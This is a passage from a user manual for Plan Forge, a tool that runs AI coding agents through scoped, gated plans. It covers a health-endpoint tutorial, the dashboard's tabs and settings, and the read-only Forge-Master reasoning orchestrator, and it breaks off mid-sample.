# Output: spec.md, plan.md, tasks.md written to ./speckit-export/
This is useful when different team members work in different tools: the architect specifies in Spec Kit, the builder executes in Plan Forge, and the archived spec stays in Spec Kit format for documentation consistency.
Spec Kit's constitution.md and Plan Forge's PROJECT-PRINCIPLES.md serve the same function: declaring non-negotiable constraints for AI agents. When both files exist in a project, Plan Forge merges them at import time using a last-writer-wins policy (Plan Forge's file takes precedence on conflicts), then presents the unified rule set to the hardener. The merge report is included in the smelt metadata so you can audit exactly which rules came from each source.
Treat constitution.md as the authoritative source (edited via /speckit.constitution) and let Plan Forge's import sync it to PROJECT-PRINCIPLES.md automatically. Use pforge crucible import --from=spec-kit --sync-principles to update PROJECT-PRINCIPLES.md in place.
When using Plan Forge's multi-agent mode, each agent worker receives the Spec Kit provenance metadata in its slice context. This means a Copilot Coding Agent worker dispatched via pforge run-plan --worker copilot-coding-agent receives the original spec.md acceptance criteria alongside the Plan Forge scope contract, so both constraint systems are active simultaneously.
Plan Forge's Spec Kit interop is registered as a first-class community extension. You can inspect its schema, version history, and compatibility notes via:
pforge ext info spec-kit-interop
For the full Plan Forge extension surface (browsing, installing, and authoring community extensions), see Chapter 12: Extensions.
Hands-on: specify, harden, and execute a real feature in 30 minutes.
pforge smith shows all green. You have VS Code + Copilot ready.
A GET /health endpoint. It's deliberately simple: the point is to learn the pipeline, not to build something complex. You'll run the full 7-step flow (Specify → Pre-flight → Harden → Execute → Sweep → Review → Ship) on a feature that takes 15 minutes to code, so you can focus on how the system works.
1. Open a chat session: Ctrl+Shift+I (Windows) or Cmd+Shift+I (Mac)
2. Attach .github/prompts/step0-specify-feature.prompt.md
3. Replace <FEATURE-NAME> with health-endpoint and send
The agent interviews you. Here are example answers for a health endpoint:
Problem: Load balancers need to verify the service is running.
Scenarios: GET /health every 30s. Expects 200 OK with {"status":"healthy"}.
Criteria: Returns 200 with JSON. Under 50ms. No auth required.
Edge cases: If DB unreachable → 503 {"status":"degraded","reason":"database"}.
Out of scope: No deep checks (Redis, APIs). No metrics endpoint.
The agent compiles your answers into a specification and creates docs/plans/Phase-1-HEALTH-ENDPOINT-PLAN.md.
Still in the same chat session:
1. Attach .github/prompts/step1-preflight-check.prompt.md
2. Replace <YOUR-PLAN> with Phase-1-HEALTH-ENDPOINT-PLAN and send
The agent checks git state, guardrail files, and the roadmap. Everything should pass. If something fails, it tells you exactly what to fix.
1. Attach .github/prompts/step2-harden-plan.prompt.md
2. Replace <YOUR-PLAN> with Phase-1-HEALTH-ENDPOINT-PLAN and send
The agent adds the mandatory blocks to your plan. When it says "Plan hardened", Session 1 is done.
Open the plan file. Every hardened plan has these sections; here's what each means:
# Phase 1, Health Endpoint
## Scope Contract ← What files the AI can touch
In Scope: src/controllers/**, tests/health/**
Out of Scope: frontend, deployment, CI/CD
Forbidden Actions: Do NOT modify src/database/migrations/
## MUST Criteria ← Required outcomes (non-negotiable)
- [ ] GET /health returns 200 with JSON body
- [ ] 503 when database unreachable
- [ ] Response time under 50ms
## SHOULD Criteria ← Nice to have (best-effort)
- [ ] Structured logging on health check calls
## Execution Slices ← Checkpointed work chunks
### Slice 1, Health Controller [30 min]
Tasks: Create controller, route, response model
Gate: `dotnet build` passes ← Must pass before Slice 2
Stop if: Build fails ← Halts execution
### Slice 2, Tests + Edge Cases [30 min]
Tasks: Unit tests, 503 degraded scenario
Gate: `dotnet test`, 4+ tests pass
Stop if: Any test regresses
## Branch Strategy
Branch: feature/phase-1-health-endpoint
## Rollback Plan ← How to undo if things go wrong
1. `git revert HEAD~2..HEAD`             ← Reverts both slice commits
| Section | Purpose | What Goes Wrong Without It |
|---|---|---|
| Scope Contract | Boundaries: what's in, out, forbidden | AI refactors unrelated files |
| MUST Criteria | Non-negotiable requirements | Features ship incomplete |
| Execution Slices | 30–120 min checkpointed chunks | Monolithic changes, late failure discovery |
| Validation Gates | Build/test commands at each boundary | Broken code propagates to next slice |
| Stop Conditions | When to halt instead of working around | AI hacks around failures |
| Rollback Plan | How to revert if needed | Panic when things break |
Three ways to execute; pick one:
pforge run-plan docs/plans/Phase-1-HEALTH-ENDPOINT-PLAN.md
Kick off and walk away. Watch progress at localhost:3100/dashboard.
pforge run-plan --assisted docs/plans/Phase-1-HEALTH-ENDPOINT-PLAN.md
You code in VS Code. Orchestrator validates gates automatically.
Start a new Copilot session. Attach step3-execute-slice.prompt.md. The AI reads the plan and executes slice by slice.
The agent creates the health endpoint, runs build, runs test, and reports pass/fail at each gate. If a gate fails, execution stops; there are no silent failures.
After execution, the completeness sweep scans for deferred-work markers:
pforge sweep
It searches all code for TODO, FIXME, HACK, stub, placeholder, mock data. For a health endpoint, this should find zero. If it finds anything, resolve it before review.
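What the sweep looks for can be sketched as a line-by-line marker scan. This illustrates the idea only and is not pforge sweep itself: the sweep function is a hypothetical helper, it takes file contents as a dict to stay self-contained, and case-insensitive whole-word matching is an assumption.

```python
import re

# Deferred-work markers named above; matched as whole words, ignoring case.
MARKERS = re.compile(r"\b(TODO|FIXME|HACK|stub|placeholder|mock data)\b", re.IGNORECASE)


def sweep(files):
    """Return (path, line number, marker) for every deferred-work marker found."""
    findings = []
    for path, text in files.items():
        for line_number, line in enumerate(text.splitlines(), start=1):
            match = MARKERS.search(line)
            if match:
                findings.append((path, line_number, match.group(1)))
    return findings


files = {
    "src/HealthController.cs": "return Ok(status);\n// TODO: add DB check\n",
    "tests/HealthTests.cs": "Assert.True(response.IsSuccess);\n",
}
findings = sweep(files)
print(findings)
```

An empty findings list is the "zero" result the sweep should produce for the health endpoint.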
Start a NEW chat session (click the + button). This is critical: the reviewer must not carry context from the builder.
1. Attach .github/prompts/step5-review-gate.prompt.md
2. Replace <YOUR-HARDENED-PLAN> with Phase-1-HEALTH-ENDPOINT-PLAN and send
The reviewer checks all changes against the Scope Contract: forbidden files, architecture compliance, test coverage, scope creep. For a health endpoint, expect a clean PASS.
1. Attach .github/prompts/step6-ship.prompt.md
2. The agent commits with a message such as feat(health): add GET /health endpoint
3. It updates DEPLOYMENT-ROADMAP.md to mark the phase complete
Session 1 (Specify & Plan) → You described what you wanted, the AI structured it
Session 2 (Execute) → The AI built it slice-by-slice with validation gates
Session 3 (Review) → A fresh AI session checked for mistakes and drift
Session 4 (Ship) → The AI committed, updated docs, captured lessons
Each session was isolated: the reviewer didn't carry bias from the builder. Every step had guardrails loaded automatically from your .github/instructions/ files.
Instead of attaching prompt files, use pipeline agents with handoff buttons:
Same pipeline, fewer steps. The prompt template approach is better for learning; agents are better for daily use.
📄 Full reference: Quickstart — Install, greenfield-todo-api walkthrough on GitHub
37 tabs across 4 top-level groups (Forge / LiveGuard / Forge-Master / Settings). Real-time execution monitoring, cost tracking, session replay, one-click actions, watcher live feed, and LiveGuard health.
The dashboard is part of the MCP server (Model Context Protocol, the standard that lets AI agents call functions). Start it, then open your browser:
# Full MCP server (stdio + HTTP + WebSocket)
node pforge-mcp/server.mjs
# Dashboard + REST API only (no MCP stdio)
node pforge-mcp/server.mjs --dashboard-only
Open localhost:3100/dashboard. The dashboard connects via WebSocket on port 3101 for real-time updates.
With .vscode/mcp.json configured (created during setup), the MCP server starts automatically when Copilot uses a forge tool. The dashboard is always available at port 3100 while the server runs.
The dashboard groups its tabs into 4 top-level groups (Forge / LiveGuard / Forge-Master / Settings). Knowing which group a tab lives in is the fastest way to find what you're looking for, especially across the 37 tabs total. Click a group tab in the top nav to expose its sub-tabs.
| Group | Tabs | Purpose |
|---|---|---|
| Forge (19) | Home, Review, Progress, Crucible, Governance, Runs, Cost, Actions, Replay, Traces, Skills, Tempering, Memory, Timeline, Inner Loop, Extensions, Anvil/Lattice, GitHub Metrics, Team Dashboard | Build, execute, ship; active-run monitoring |
| LiveGuard (7) | Health, Incidents, Triage, Security, Env, Watcher, Bug Registry | Post-deploy defense |
| Forge-Master (1) | Studio | Read-only reasoning orchestrator |
| Settings (10) | General, Models, Execution, API Keys, Updates, Memory, Bridge, Crucible, Brain, Forge-Master | Platform-wide config (safe-write to .forge.json) |
The default view during plan execution. This is where you watch your plan come to life, with real-time slice status delivered via WebSocket updates:
Each card shows: slice title, status (queued → executing → passed/failed), duration, model used, token count, and cost. Cards update in real-time as events arrive over WebSocket.
History of all plan executions. Each row shows:
| Column | Content |
|---|---|
| Plan | Plan file path (clickable → shows slice detail) |
| Status | ✓ Complete, ✗ Failed, ● Partial |
| Slices | Passed / Total count |
| Duration | Total wall-clock time |
| Cost | Total USD across all slices |
| Model | Primary model used |
| Date | Execution timestamp |
Click any row to expand slice-by-slice detail: per-slice tokens, duration, model, and pass/fail status.
Two visualizations:
Data comes from .forge/cost-history.json which is updated automatically after each run. The cost tab supports a 23-model pricing table, including Claude, GPT, Grok, Gemini, and custom API providers.
Use pforge run-plan --estimate to predict costs before executing.
One-click buttons for common operations, no terminal needed:
Each button calls a forge MCP tool through the generic /api/tool/:name dispatcher (e.g. POST /api/tool/forge_smith, POST /api/tool/forge_sweep) and displays results inline.
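For scripting the same actions outside the dashboard, a request to the dispatcher might be assembled as in the sketch below. The helper name buildToolRequest is hypothetical, and sending the tool arguments as a JSON body is an assumption; only the POST /api/tool/:name route and port 3100 come from the text above.

```javascript
// Hypothetical helper: builds (but does not send) a dispatcher request.
// ASSUMPTION: tool arguments travel as a JSON request body.
function buildToolRequest(toolName, args = {}, baseUrl = "http://localhost:3100") {
  return {
    url: `${baseUrl}/api/tool/${encodeURIComponent(toolName)}`,
    options: {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify(args),
    },
  };
}

const request = buildToolRequest("forge_sweep");
console.log(request.options.method, request.url);
// To send it (Node 18+ or a browser):
//   const res = await fetch(request.url, request.options);
```

Keeping the builder separate from the fetch call makes it easy to log or inspect the request before anything reaches the server.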
Browse agent session logs from past executions. Each run's .forge/runs/<timestamp>/ directory contains per-slice logs. The Replay tab renders them with:
Use this to diagnose why a slice failed: the full agent conversation, including tool calls, is captured.
Visual catalog browser with search. Shows all community extensions from extensions/catalog.json:
Equivalent to pforge ext search + pforge ext add but with a visual interface.
OTLP (OpenTelemetry Protocol) trace waterfall view. Every plan execution emits OpenTelemetry spans:
| Span | What It Captures |
|---|---|
| run (root) | Plan file, total duration, slice count, model |
| └ slice-N | Slice title, status, tokens in/out, cost, gate result |
| └ gate | Gate command, exit code, output |
| └ escalation | If a model failed and escalated to the next in chain |
Click any span to expand: duration, resource attributes (project, version, preset), severity. Traces are stored in .forge/runs/<timestamp>/traces.json and can be exported to any OTLP-compatible backend (Jaeger, Grafana Tempo, etc.).
Monitor skill executions triggered via forge_run_skill or /slash-command. Shows:
- Skill lifecycle events (skill-started, skill-step-completed, skill-completed)
Read-only view of another project's pforge run, consumed from a second VS Code / Copilot session. Subscribes to watch-snapshot-completed, watch-anomaly-detected, and watch-advice-generated hub events emitted by forge_watch / forge_watch_live. Shows:
- Anomalies (stalled, slice-failed, quorum-dissent, quorum-leg-stalled, skill-step-failed, model-escalated, etc.) with message + run ID
- pforge watch-live / pforge watch invocations
Live feed of narrations produced by the Forge-Master Observer, the background hub subscriber that batches live plan events and narrates notable patterns in plain prose. The card renders the last 20 narrations, updating in real time via the existing dashboard WebSocket (observer:narration event type).
- Fed by observer:narration hub events emitted from pforge-master/src/observer-loop.mjs; narrations are also stored in Brain via brain_capture if cfg-observer-brain-capture is enabled
Retrospective health view powered by forge_watch({ mode: "cross-run" }). Aggregates .forge/runs/*/summary.json files into a health snapshot and surfaces recurring failure patterns across your run history — useful for diagnosing systemic issues that individual-run views miss.
- Calls GET /api/watcher/cross-run server-side (wraps the cross-run watcher), rendering fresh results within 2 s for repos with ≤ 50 runs
- Results are cached in .forge/cross-run-cache.json with a 1-hour TTL; the cached result loads automatically on page load so the card is never blank
- Each finding shows its code (cross-run.recurring-gate-failure, cross-run.retry-rate-spike, cross-run.cost-anomaly-trend, cross-run.slice-timeout-cluster), severity, and recommendation
Renders the most recent Plan-Health Auditor report from .forge/health/latest.md directly on the dashboard. The auditor is invoked automatically after failed runs or every N runs (configurable in Settings → Forge-Master).
- <script> tags, raw HTML injection, <iframe>, and javascript: URLs are all stripped server-side before the response leaves GET /api/auditor/latest; safe elements (headings, lists, code blocks, bold/italic) render normally
- .forge/health/ archive listing so you can browse older reports
- GET /api/auditor/latest returns { markdown, timestamp, archive: [...] }
The audit loop is opt-in. It's not on a Settings tab; the mode is read directly from .forge.json#audit.mode:
- Mode: off (default) / auto / always
- Environments: dev and staging by default; production is hard-blocked unless allowProduction: true in scanner opts (and even then only with explicit override)
- Drain rounds emit tempering-round-completed hub events and surface in the Forge → Tempering tab
Trigger manually with pforge audit-loop --auto (respects .forge.json#audit.mode) or via the forge_tempering_drain MCP tool. See Audit Loop deep dive for the full activation flow.
Unified chronological view of every event across the shop. Source chips filter the feed:
- run: plan executions (slice progress, completes, aborts)
- incident: LiveGuard incident lifecycle
- bug: Bug Registry status changes
- deploy: forge_deploy_journal entries
- crucible: smelt lifecycle (started / question / finalized)
- fm-turn (v2.82): Forge-Master turns (lane + truncated user message + turn number)
- memory: memory-captured events from OpenBrain
- tempering: audit-loop drain rounds
- watch: watcher snapshot / anomaly / advice events
The CLI equivalent is pforge timeline: same 9 sources, same correlation-id grouping, JSON-pipeable for scripts.
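The source-chip filtering and correlation-id grouping can be sketched in a few lines. The nine source names come from the list above; the event shape ({ ts, source, correlationId, summary }) and both function names are assumptions for illustration, not the actual timeline schema.

```javascript
// Source names from the manual; everything else here is an assumed shape.
const TIMELINE_SOURCES = [
  "run", "incident", "bug", "deploy", "crucible",
  "fm-turn", "memory", "tempering", "watch",
];

// Keep only events whose source chip is active, oldest first.
function filterTimeline(events, activeSources = TIMELINE_SOURCES) {
  const wanted = new Set(activeSources);
  return events.filter((e) => wanted.has(e.source)).sort((a, b) => a.ts - b.ts);
}

// Group events that share a correlation id.
function groupByCorrelationId(events) {
  const groups = new Map();
  for (const e of events) {
    const key = e.correlationId ?? "(none)";
    if (!groups.has(key)) groups.set(key, []);
    groups.get(key).push(e);
  }
  return groups;
}

const events = [
  { ts: 3, source: "incident", correlationId: "c1", summary: "drift incident opened" },
  { ts: 1, source: "run", correlationId: "c1", summary: "slice 1 passed" },
  { ts: 2, source: "fm-turn", correlationId: "c2", summary: "troubleshoot turn 4" },
];

const visible = filterTimeline(events, ["run", "incident"]);
console.log(visible.map((e) => e.summary));
console.log([...groupByCorrelationId(events).keys()]);
```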
| Port | Protocol | Purpose |
|---|---|---|
| 3100 | HTTP | Dashboard UI + REST API |
| 3101 | WebSocket | Real-time events (slice progress, run completion) |
Override the ports with the PORT and WS_PORT environment variables, or use the --port flag: node pforge-mcp/server.mjs --port 4100.
📄 Full reference: capabilities, Appendix V — Event Catalog (every WebSocket event with payload and retention), EVENTS.md on GitHub (raw JSON schema)
10 purpose-built sub-tabs for platform-wide configuration. Part of Chapter 7: The Dashboard.
The Settings group is a top-level container with 10 purpose-built sub-tabs for platform-wide configuration. It replaced the older single Config tab. Settings is one of four top-level groups in the dashboard nav:
Click Settings in the top nav and you'll see 10 purple-accented sub-tabs. Every tab persists changes to its specific config file via the dashboard's safe-write path: the sanitizer drops unknown fields and snaps numbers to safe bounds, so no UI bug can corrupt your config.
Project identity: preset, template version, and agent enablement.
- Preset: set with setup.ps1 -Preset <name>.
- Template version: pforge update bumps this.
- Agent enablement: stored in .forge.json#agents.
Model routing: default execution model and image generation model selection.
- Default execution model: auto (orchestrator picks per slice), or pin to a specific model
- Image generation model: Aurora (XAI_API_KEY) or DALL-E (OPENAI_API_KEY) for diagrams and chapter heroes via forge_generate_image
Per-slice execution behavior: quorum mode, escalation chain, complexity threshold, retry policy. The most-edited Settings tab during day-to-day work.
Stores API keys in .forge/secrets.json (gitignored). Same precedence as env vars: anything set here is picked up by the orchestrator without restarting the server.
- XAI_API_KEY: Grok models + Aurora image generation
- OPENAI_API_KEY: GPT models direct + DALL-E (also enables OpenAI fallback for COPILOT_SERVABLE models)
- ANTHROPIC_API_KEY: Claude direct (Forge-Master + workers without claude CLI)
Values are masked on display. The "Test" button next to each key validates it by calling the provider's lightweight endpoint, never the full reasoning model.
Framework version status + one-click pforge self-update from upstream. Surfaces version drift between your local VERSION and GitHub's latest release.
OpenBrain wiring: server URL, MCP credentials, project scope. See Chapter 21 — Memory Architecture for the three-tier model.
Remote Bridge endpoints for Slack / Teams / PagerDuty / OpenClaw / Telegram / Discord. See Chapter 20 — Remote Bridge for the per-channel walkthrough.
Idea-smelting pipeline configuration. Persists to .forge/crucible/config.json.
- tweak (4q) / feature (7q) / full (~12q). Lane controls interview length.
- source: agent, finalize without human approval (off by default)
- STALE_PRINCIPLES/STALE_PROFILE in the interview
Forge-Master reasoning configuration: reasoningModel, routerModel, quorumAdvisory, embeddingFallback, GitHub Models zero-key path. See Forge-Master → Configuration for every field.
The audit-loop mode is read from .forge.json#audit.mode (off | auto | always) and is toggled as described in the Audit Loop chapter. Drain results stream into the Tempering tab in the Forge group.
Configuration for Forge-Master's autonomous background roles: the Observer (live narration of hub events) and the Auditor (automated post-run health analysis). Both are off by default — enable each role with one click here or by editing .forge.json directly.
The Observer is a mute-by-default background hub subscriber. When enabled it batches live plan events into 60-second windows and narrates notable patterns via the Forge-Master reasoning loop. Narrations are stored in Brain and stream to the Observer Narrations card on the main dashboard view.
| Field ID | Type | Default | Effect |
|---|---|---|---|
| cfg-observer-enabled | checkbox | off | Enables/disables the observer process. Maps to forgeMaster.observer.enabled. |
| cfg-observer-modeltier | select | inherit | Model quality tier for narration calls. inherit uses the Brain reasoningModel; other options: flagship, mid, fast. See Model tier dropdown below. |
| cfg-observer-budget-usd | number | 0.10 | Daily USD spending cap. Rejects negative values. Maps to forgeMaster.observer.maxUsdPerDay. |
| cfg-observer-budget-narrations | number | 6 | Hourly narration frequency cap. Rejects negative values. Maps to forgeMaster.observer.maxNarrationsPerHour. |
| cfg-observer-batch-window-ms | number | 60000 | Event batch window in milliseconds. Lower values produce more frequent (and expensive) narrations. Maps to forgeMaster.observer.batchWindowMs. |
| cfg-observer-brain-capture | checkbox | on | Whether narrations are written to Brain (via brain_capture) in addition to the hub event stream. Disable to reduce Brain storage usage. Maps to forgeMaster.observer.brainCapture. |
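To make the defaults and the "rejects negative values" rule concrete, here is a minimal sketch of how an observer block could be sanitized before it is written. The key names and defaults come from the table above; the function name sanitizeObserverConfig and the choice to throw on bad input (rather than clamp) are assumptions, and the model-tier field is left out because its config key is not stated here.

```javascript
// Defaults taken from the Observer table; behaviour on bad input is assumed.
const OBSERVER_DEFAULTS = {
  enabled: false,
  maxUsdPerDay: 0.1,
  maxNarrationsPerHour: 6,
  batchWindowMs: 60000,
  brainCapture: true,
};

function sanitizeObserverConfig(input = {}) {
  const out = { ...OBSERVER_DEFAULTS };
  // Only known keys are copied, so unknown fields are dropped.
  for (const key of Object.keys(OBSERVER_DEFAULTS)) {
    if (!(key in input)) continue;
    const value = input[key];
    const expected = typeof OBSERVER_DEFAULTS[key];
    if (typeof value !== expected) {
      throw new TypeError(`${key} must be a ${expected}`);
    }
    if (expected === "number" && (!Number.isFinite(value) || value < 0)) {
      throw new RangeError(`${key} must be a non-negative number`);
    }
    out[key] = value;
  }
  return out;
}

console.log(sanitizeObserverConfig({ enabled: true, bogusField: 42 }));
```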
The Auditor automatically invokes the Plan-Health Auditor agent after runs, writing reports to .forge/health/latest.md. Results are surfaced on the Auditor Latest Report card.
| Field ID | Type | Default | Effect |
|---|---|---|---|
| cfg-auditor-modeltier | select | inherit | Model quality tier for auditor analysis. Same four canonical tokens as the observer tier. Maps to forgeMaster.auditor.modelTier. |
| cfg-auditor-on-failure | checkbox | off | Invoke the auditor automatically whenever a run ends in failure. Maps to hooks.postRun.invokeAuditor.onFailure. |
| cfg-auditor-every-n-runs | number | blank (off) | Invoke the auditor periodically every N runs. Leave blank to disable periodic invocation. Values 1–4 are rejected; the minimum opt-in value is 5 (reasonable cadence; see Resolved Decision in Phase-40 plan). Maps to hooks.postRun.invokeAuditor.everyNRuns. |
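The everyNRuns rule (blank disables, 1–4 rejected, 5 or more accepted) is easy to get wrong in a form handler, so a small sketch may help. Both function names are hypothetical, and the "fire when the run count is a multiple of N" interpretation of "every N runs" is an assumption.

```javascript
// Parses the raw field value: blank means "off", values below 5 are rejected.
function parseEveryNRuns(raw) {
  if (raw === "" || raw === null || raw === undefined) return null;
  const n = Number(raw);
  if (!Number.isInteger(n) || n < 5) {
    throw new RangeError("everyNRuns must be an integer >= 5, or blank to disable");
  }
  return n;
}

// ASSUMPTION: periodic invocation fires when runCount is a multiple of N.
function shouldInvokeAuditor({ runFailed, runCount }, { onFailure = false, everyNRuns = null } = {}) {
  if (runFailed && onFailure) return true;
  return everyNRuns !== null && runCount % everyNRuns === 0;
}

console.log(parseEveryNRuns(""), parseEveryNRuns("10"));
console.log(shouldInvokeAuditor({ runFailed: false, runCount: 20 }, { everyNRuns: 10 }));
```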
Both the Observer and Auditor share the same four canonical model-tier tokens. The UI displays human-friendly labels while the backend stores the canonical token in .forge.json:
| UI label | Canonical token | Meaning |
|---|---|---|
| Inherit from Brain settings | null / inherit | Uses the reasoningModel configured in Settings → Brain |
| Flagship (best quality) | flagship | Highest-capability model in the configured provider (e.g., Claude Opus, GPT-4o) |
| Balanced | mid | Mid-tier model — good quality at lower cost |
| Fast (low cost) | fast | Fastest, cheapest model — suitable for high-frequency narrations |
Cross-references: forgeMaster.observer schema · forgeMaster.auditor schema.
The reasoning orchestrator's home in the dashboard. Part of Chapter 7: The Dashboard.
The reasoning orchestrator's home. See the Forge-Master chapter for the deep dive. Three panels:
- Calls POST /api/forge-master/chat to start, then subscribes to GET /api/forge-master/chat/:sessionId/stream. Shows live classification badge with the via field (keyword / embedding-cache / router-llm), quorum-estimate cost preview if advisory mode triggers (with cancel button), live tool-call trace, and the streaming reply token-by-token.
- Reads GET /api/forge-master/cache-stats. Shows {size, hitRate, maxSize: 500}. When cold, displays a hint that hits start once you've used Forge-Master a few times.
Every Forge-Master response shows a classification badge indicating how the intent was routed:
| Via value | Meaning |
|---|---|
| keyword | Fast-path: matched by keyword rules, no model call for routing |
| embedding-cache | Hit the write-through embedding cache, free re-route |
| router-llm | Router model called to classify intent (stage 2 fallback) |
When quorumAdvisory is set to auto or always in Settings → Brain, advisory-lane responses show a quorum-estimate cost preview before the models are called. A cancel button aborts the quorum dispatch if the estimated cost is too high.
The Studio tab maintains a persistent per-tab session ID in sessionStorage and sends it as x-pforge-session-id on every request. Prior turns therefore survive page reloads and New Chat resets, so Forge-Master can reference earlier messages in the same browser tab session.
Session history is stored as JSONL in .forge/fm-sessions/. Use pforge fm-session list to inspect sessions or pforge fm-session purge to clean up. Sessions auto-rotate at 200 turns.
Forge-Master turns are indexed as the fm-turn source in the Timeline tab. Each entry shows the lane, a truncated user message, and turn number. Useful for correlating reasoning decisions with plan execution events.
Five amber-accented tabs for post-deploy defense: Health, Incidents, Triage, Security, and Env. Part of Chapter 7: The Dashboard.
Five amber-accented tabs separated by a visual divider from the FORGE section. LiveGuard tools (forge_drift_report, forge_regression_guard, forge_incident_capture, forge_secret_scan, forge_env_diff, forge_liveguard_run, etc.) broadcast liveguard + liveguard-tool-completed events that populate these tabs in real time.
Composite project health fingerprint produced by forge_health_trend and forge_liveguard_run:
- forge_liveguard_run
- .forge/health-dna.json for cross-session decay detection
Open and recently resolved incidents captured by forge_incident_capture and auto-chained from drift:
- high
- forge_regression_guard passes on overlapping scope
- forge_fix_proposal plans linked to the originating incident are surfaced inline
Prioritized alert stream from forge_alert_triage:
- pforge-mcp/, pforge.*, setup.* paths are excluded from app-code scoring
Secret hygiene and dependency vulnerability posture:
- forge_secret_scan, masked as <REDACTED>, confidence high / medium / low
- forge_dep_watch output for npm (npm audit) and .NET (dotnet list package --vulnerable)
- hooks.preDeploy is enabled
Environment-variable drift between local .env, example templates, and deploy targets via forge_env_diff:
- .env.example / deploy config but absent from local .env
- forge_deploy_journal entry
A read-only reasoning orchestrator with its own dashboard tab. Classifies intent, pulls OpenBrain memory, and chains read-only forge tools on your behalf, so you can ask open-ended questions instead of wiring tool calls by hand.
Plan Forge has 102 MCP tools. Most of the time you know which one you need. But sometimes you don't, because the question is open-ended and needs a chain of tools:
- forge_watch_live + brain_recall + forge_bug_list
- forge_status + forge_plan_status
- forge_search + brain_recall for prior decisions + maybe forge_diagnose
Chaining the right tools by hand is slow and easy to get wrong. Forge-Master is the front door: one prompt in, one synthesized answer out. Behind the scenes it classifies your intent, pulls relevant memory, and orchestrates whatever read-only tools fit.
Forge-Master is read-only: it cannot, for example, modify .forge.json or finalize a smelt. That guarantee is what makes it safe to ask anything at any time. When the answer requires a write, Forge-Master tells you the exact tool to call yourself.
| Surface | Best for | Where |
|---|---|---|
| Studio tab | Interactive exploration with prompt gallery, streaming chat, live tool-call trace | localhost:3100/dashboard → Studio |
| forge_master_ask MCP tool | Agents that want one-shot reasoning embedded in a larger conversation | Any MCP-compatible client (Copilot, Claude Code, Cursor, Codex, Windsurf) |
| pforge forge-master status\|logs | Scripts, CI checks, health probes | CLI |
forge_master_ask tool
The MCP tool is a one-shot entry-point:
forge_master_ask {
message: "Why did Phase-27 Slice 4 fail?"
}
→ {
ok: true,
lane: "troubleshoot",
via: "router-llm", // or "keyword" / "embedding-cache"
toolCalls: [
{ name: "forge_watch_live", args: { phase: "27", slice: 4 } },
{ name: "brain_recall", args: { query: "Phase-27 slice 4 failures" } }
],
reply: "The slice failed because…",
costUSD: 0.0023
}
Prefer forge_master_ask over manually calling individual forge tools when the task is open-ended or involves multiple steps. Don't use it for direct file edits; Forge-Master is read-only.
Every prompt is classified into a lane before tools are dispatched. The classifier runs three stages in order, falling through only when the prior stage didn't match confidently. This keeps the common case free (keyword) and the edge case smart (router LLM).
Fast regex/keyword match against per-lane vocabularies. Zero API cost. Returns immediately if confidence is high. Covers the bulk of operational prompts ("open bugs", "failing gate", "scope contract violation", etc.).
Cosine-similarity match (≥ 0.85) against previously-classified prompts. Zero API cost on hit. Uses all-MiniLM-L6-v2 via @xenova/transformers (lazy-loaded peer dep), or a deterministic hash bag-of-words fallback when the package isn't installed. Works fully offline once warm.
Default model: grok-3-mini. Used for ambiguous prompts the cache hasn't seen. Every successful classification is then written through to the cache, so the next similar prompt skips this stage entirely.
Each successful turn carries a via field telling you which stage answered: "keyword", "embedding-cache", or "router-llm". The dashboard's Forge-Master tab summarizes the distribution as {keyword, embedding, router} percentages.
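The fall-through order described above (keyword, then embedding cache, then router LLM with write-through) can be sketched as a small cascade. This is not Forge-Master's code: the keyword vocabularies, the function names, and the in-memory exact-match cache standing in for cosine similarity are all illustrative assumptions. Only the 0.85 threshold and the three via values come from the text.

```javascript
// Illustrative vocabularies only; the real per-lane vocabularies are not shown here.
const KEYWORDS = {
  operational: [/\bstatus of\b/i, /\bopen bugs\b/i],
  troubleshoot: [/\bwhy did .* fail\b/i, /\bfailing gate\b/i],
  advisory: [/\bshould we\b/i, /\bwhich approach\b/i],
};

function keywordStage(prompt) {
  for (const [lane, patterns] of Object.entries(KEYWORDS)) {
    if (patterns.some((p) => p.test(prompt))) return lane;
  }
  return null;
}

// cacheLookup returns { lane, similarity } or null; routerLLM returns a lane.
function makeClassifier({ cacheLookup, cacheStore, routerLLM }) {
  return function classify(prompt) {
    const byKeyword = keywordStage(prompt);
    if (byKeyword) return { lane: byKeyword, via: "keyword" };

    const cached = cacheLookup(prompt);
    if (cached && cached.similarity >= 0.85) {
      return { lane: cached.lane, via: "embedding-cache" };
    }

    const lane = routerLLM(prompt);
    cacheStore(prompt, lane); // write-through so the next similar prompt skips the router
    return { lane, via: "router-llm" };
  };
}

// Demo with an exact-match Map standing in for the embedding cache.
const demoCache = new Map();
const classify = makeClassifier({
  cacheLookup: (p) => (demoCache.has(p) ? { lane: demoCache.get(p), similarity: 1 } : null),
  cacheStore: (p, lane) => demoCache.set(p, lane),
  routerLLM: () => "build", // stub in place of a real model call
});

console.log(classify("should we split this phase?"));
console.log(classify("scaffold a billing module"));
console.log(classify("scaffold a billing module"));
```

The second and third calls use the same prompt on purpose: the first one falls through to the router stub, and the repeat is answered from the cache.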
Forge-Master classifies into one of these lanes. Each lane has a different default tool allowlist:
| Lane | Use case | Quorum-eligible? |
|---|---|---|
| operational | Status queries, run lookups, "what's happening", reads runs, plan status, costs | No (hard-blocked) |
| troubleshoot | Failure diagnosis, reads logs, watch-live, bugs, traces | No (hard-blocked) |
| build | "How would I build X", reads patterns, runbooks, prior plans | No (hard-blocked) |
| advisory | Open-ended judgment calls, "should we…", "which approach…", "what's the trade-off…" | Yes (default escalation target for quorum advisory) |
| offtopic | Catch-all when nothing else matches; routed to a polite fallback reply | No |
For high-stakes decisions in the advisory lane, Forge-Master can fan the prompt out to 2–3 models in parallel and return all replies plus a dissent summary. The human picks the reply; there's no auto-winner selection, because the whole point is to surface disagreement.
Quorum advisory is separate from the quorum mode of pforge run-plan execution. See the side-by-side comparison in Chapter 14 for when to use which.
Set quorumAdvisory in .forge.json → forgeMaster:
| Mode | When quorum fires |
|---|---|
| "off" (default) | Never. Single-model reply only. |
| "auto" | Lane is advisory AND prompt was auto-escalated to the high tier AND classifier confidence is medium or above. The conservative trigger. |
| "always" | Every advisory-lane prompt fires quorum. Highest spend, highest signal. |
The operational, troubleshoot, and build lanes are hard-blocked: even with "always", those lanes get a single-model reply. Quorum is for judgment, not for lookups.
Before any model is called, the GET /api/forge-master/chat/:sessionId/stream endpoint emits a quorum-estimate SSE event with the projected cost. Studio displays this and lets you cancel before spending. Programmatic clients should listen for the event:
data: {"type":"quorum-estimate","models":3,"estimatedUSD":0.0142,"models":[
{"name":"claude-opus-4.7","estUSD":0.0061},
{"name":"gpt-5.3-codex","estUSD":0.0048},
{"name":"grok-4.20","estUSD":0.0033}
